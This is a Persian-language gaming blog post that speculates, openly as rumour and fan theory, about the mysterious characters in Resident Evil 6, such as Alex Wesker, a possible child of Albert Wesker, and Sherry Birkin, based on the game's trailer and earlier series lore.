تبلیغات
بازیکده - پرسه در تاریکی

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

دوشنبه 22 اسفند 1390-03:00 ب.ظهمان طور که می دانید، بازی Resident Evil 6 مدتی پیش توسط Capcom معرفی شد و طرفداران این سری از بازی ها برای اولین بار، دو شخصیت مطرح دنیای RE را در یک بازی مشاهده کردند. کمپانی Capcom تا این لحظه اطلاعات زیادی را از این بازی منتشر نکرده و به همین دلیل شایعات زیادی پیرامون این بازی شکل گرفته اند. شخصیت های مرموزی در این بازی حضور دارند که هنوز مشخص نشده که واقعاً چه کسانی هستند. منابع مختلف به این موضوع اشاره کرده اند که شخصیت های این بازی ارتباط زیادی به نسخه های قبلی دارند. در این مطلب به بررسی این شایعات می پردازیم و احتمالاتی را بررسی می کنیم که ممکن است درست از کار در بیایند.

تئوری شماره 1: بازگشت پروژه وسکر

آلبرت وسکر (Albert Wesker) مرده است. این موضوع در Resident Evil 5 مشخص شده و باعث شده که یکی از احتمالات اصلی برای دنباله دار شدن این سری از بازی ها از بین برود، اما در این نسخه از سری بازی های Resident Evil به نظر نمی رسد که وسکر واقعاً مرده باشد. در تریلری که از این بازی منتشر شده، مزدورهایی را مشاهده کردیم که ارتباطی با مأموران کمپانی Umbrella داشته اند. یکی از بخش هایی که در سری بازی های Resident Evil به آن اشاره ای نشده، خانواده وسکر است. آیا وسکر واقعاً خانواده ای داشته یا او نیز یک پروژه به نام وسکر بوده است؟ آیا وسکر یک انسان شبیه سازی شده توسط Umbrella بوده است؟ چیزی که مشخص شده، این است که وسکر در زمان کودکی توسط اشخاص خاصی دزدیده می شود و بنیانگذار کمپانی Umbrella که آزول اسپنسر (Oswell Spencer) نام داشته، روی او آزمایشات مختلفی را انجام می دهد. او روی برنامه ای به نام Survival of the Fittest کار می کرده است.

اسپنسر روی دو کودک به نام های الکس (Alex) و آلبرت (Albert) آزمایشاتی انجام می دهد و نقش مهمی را در آینده کمپانی Umbrella ایفا می کند. تا این لحظه شخصیت الکس بسیار مرموز باقی مانده است. اسپنسر در یادداشت هایی به این موضوع اشاره می کند که الکس، آلبرت را همچون برادر خود دوست داشته و به همین دلیل در اکثر آزمایش ها داوطلب می شده تا از آلبرت محافظت کند. او به موش آزمایشگاهی پروژه وسکر تبدیل می شود. اسپنسر در این پروژه به راز زندگی جاویدان پی می برد. بر اساس فایل های دیگری که از اسپنسر بدست می آیند، مشخص می شود که الکس همچنان زنده است، اما پس از انجام تحقیقات در پروژه وسکر او ناپدید می شود و وسکر نیز راز زندگی جاویدان را کشف می کند. در تریلری که از RE6 منتشر شده، شخصیتی دیده شده که از وسکر جوان تر است. احتمالاً این شخصیت الکس باشد که دلیل جوان ماندنش زندگی جوادانه است.

تئوری شماره 2: وسکر زنده است

Capcom به خوبی می داند که به چه صورت برای سری بازی های Resident Evil تاریخچه خلق کند. حتی المان هایی را در این سری از بازی ها قرار می دهد که وجود آن ها ضروری به نظر نمی رسد. این کمپانی برای شخصیت های این سری از بازی ها یک تاریخچه بسیار خوب خلق کرده است. زیاد شدن این بخش ها در هر قسمت از سری بازی های Resident Evil باعث شده که سوالات زیادی در بازی به وجود بیایند و راه همیشه برای ادامه این سری باز باشد. احتمال اینکه الکس وسکر (Alex Wesker) در این بازی دیده شود، بسیار زیاد است. بعید نیست که Capcom دست به کار دیگری بزند. یکی دیگر از مزدورانی که در این بازی دیده شده، به نظر می رسد که شری بیرکین (Sherry Birkin) باشد.

او دختر یکی از به یادماندنی ترین دشمنانی است که در این بازی مشاهده می کنید، اما اگر Capcom برای ایجاد یک حالت احساسی در بازی یک ضد قهرمان که برادر وسکر هم نباشد را قرار داده باشد، چه می شود؟ در حقیقت Capcom هیچ وقت از انجام چنین کارهایی ترس نداشته و انجام اینگونه کارها برای این کمپانی غیر ممکن نیست. در RE6 این احتمال وجود دارد که وسکر قبل از مرگش، پدر فرزندی بوده باشد. فرزند وسکر می تواند داستان بسیار خوبی را در بر داشته باشد که برای این سری از بازی ها بسیار مناسب است. او می تواند برخی از قدرت های مخصوص وسکر را نیز به صورت ژنتیکی به همراه خودش داشته باشد. در تریلری که از RE6 منتشر شد نیز شخصیت جدید بازی دارای قدرت های خاصی بود.

دنیای دیوانه Resident Evil

بدون شک دنیای این سری از بازی ها بسیار دیوانه کننده است. کریس (Chris) که همیشه قهرمان RE بوده نیز قسمت های تاریک و مرموزی دارد. از طرف دیگر، این احتمال می رود که شخصیت جدید بازی برادر یا فرزند آلبرت وسکر باشد. چیزی که احتمال آن بسیار زیاد است، این است که مزدورهایی که در این بازی مشاهده کردیم، با شخصیت های نسخه های قبلی ارتباط دارند. اینجاست که این سوال پیش می آید که آیا ممکن است یکی از این شخصیت های جدید، برادر کریس باشد؟ یا ارتباطی با لیان (Leon) داشته باشد؟ شاید هم نامزد شوا (Sheva) را هم در این بازی مشاهده کنیم! می توان تعداد بسیار زیادی از اینگونه احتمالات را خلق کرد. شخصیتی که به راحتی می تواند با گذشته ارتباط داشته باشد. به نظر می رسد که اگر Capcom زودتر اطلاعاتی درباره این بازی منتشر نکند، میزان این احتمالات بیش از پیش نیز بشود.

تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >